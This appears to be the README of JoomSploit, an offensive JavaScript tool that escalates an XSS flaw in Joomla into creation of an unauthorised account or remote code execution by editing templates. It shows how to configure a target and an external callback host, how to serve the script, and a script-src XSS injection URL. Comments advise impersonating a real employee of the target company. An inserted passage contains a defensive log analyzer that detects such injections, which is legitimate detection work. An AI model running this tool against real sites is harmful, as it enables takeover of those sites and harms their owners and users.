JoomSploit

Joomla exploitation script that elevates XSS to RCE or other critical vulnerabilities.


About

JoomSploit is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in Joomla CMS.

🌾 This script provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X.

Key Features

  • Privilege Escalation
    • Creates a user in Joomla.
  • (RCE) Built-In Templates Edit
    • Edits a built-in template in Joomla.
  • (Custom) Custom Exploits
    • Custom exploits for third-party Joomla plugins.

How To Use

example.mp4

1) Clone the Repository

git clone https://github.com/nowak0x01/JoomSploit

2) Edit the script by selecting the desired function and modifying its variable values. (Example: JLCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "http://10.5.87.12:8000/"; // Ex: https://192.168.1.99:6731/joomla/
var Callback = "https://prkiw0jsy7n0dj9qknrm57h9006ruji8.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// JLCreateAccount(); // (Privilege Escalation) - Creates a user in Joomla.
// JLEditTemplates(); // (RCE) - Edit Templates in Joomla.
// CustomExploits(); // (Custom) - Custom Exploits for Third-Party Joomla Plugins.

function JLCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Name = "Hudson Nowak";                 // Account name, Ex: Robert Silva. - <Mandatory>
    var Password = `j^QEkyvd7*g3`;          // (Password minimum length: 12) [weak passwords are allowed]. - <Mandatory>
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    /* ************************************************************************************************************************************************ */
    // ... (the rest of the function is not shown in this excerpt)
}

3) Start a web server

php -S 0.0.0.0:80 -t .

4) Go to the Joomla XSS vector and include JoomSploit.js

https://example.com/plugin.php?s=<script%20src="//VPS/JoomSploit.js"></script>
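
A defender-side companion to step 4, added here and not part of JoomSploit: a Node.js access-log check that flags query strings carrying a script tag with an off-site `src`, and backend requests whose Referer is such a page. The combined log format, the `/administrator/` backend path, the rule names and the sample lines are assumptions or constructed for this example.

```javascript
// Added example (defensive). Assumptions: combined log format; Joomla backend under /administrator/.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"/;
// <script ... src=...> whose source is on another host (absolute or protocol-relative).
const EXT_SCRIPT_RE = /<script\b[^>]*\bsrc\s*=\s*["']?\s*(?:https?:)?\/\/[^\s"'>]+/i;
// Decode repeatedly so double-encoded payloads (%253Cscript) are still recognised.
function deepDecode(value, rounds = 3) {
  let cur = value.replace(/\+/g, " ");
  for (let i = 0; i < rounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch {
      // Malformed escapes present: decode only the well-formed %XX pairs.
      next = cur.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

function analyze(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LINE_RE.exec(line);
    if (!m) continue;
    const [, ip, time, method, url, referer] = m;
    if (EXT_SCRIPT_RE.test(deepDecode(url))) {
      findings.push({ ip, time, rule: "external-script-in-url", url });
    }
    // A backend request whose Referer is an injected page was issued by script
    // running in the visitor's session, not by the admin UI itself.
    if (url.startsWith("/administrator/") && EXT_SCRIPT_RE.test(deepDecode(referer))) {
      const rule = method === "POST" ? "admin-write-from-injected-page" : "admin-read-from-injected-page";
      findings.push({ ip, time, rule, url });
    }
  }
  return findings;
}

// Constructed sample lines (hosts and addresses are placeholders).
const SAMPLE_LOG = [
  '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /plugin.php?s=%3Cscript%20src=%22//host.invalid/a.js%22%3E%3C/script%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [12/Mar/2024:10:01:03 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "https://example.com/plugin.php?s=%3Cscript%20src=%22//host.invalid/a.js%22%3E%3C/script%3E" "Mozilla/5.0"',
  '198.51.100.9 - - [12/Mar/2024:10:05:00 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "https://example.com/administrator/index.php" "Mozilla/5.0"',
  '203.0.113.4 - - [12/Mar/2024:10:06:00 +0000] "GET /plugin.php?s=%253Cscript%2520src%253D//host.invalid/a.js%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [12/Mar/2024:10:07:00 +0000] "GET /plugin.php?s=script+src+docs HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];
console.log(analyze(SAMPLE_LOG));
```

The second rule relies on the browser sending a Referer for same-origin requests, so treat a hit as a lead to correlate with backend audit logs rather than as proof.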

Examples

🎋 JLCreateAccount() - Creates a user in Joomla.

CreateAccount.mp4

🐉 JLEditTemplates() - Edits a built-in template in Joomla.

EditTemplates.mp4

⭐️ CustomExploits() - Custom Exploits for Third-Party Joomla Plugins.
// pending


Contributing

If you're interested in contributing, whether by adding new exploit functions to CustomExploits() or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better😊.

JoomSploit (https://github.com/nowak0x01/JoomSploit)
@Author: Hudson Nowak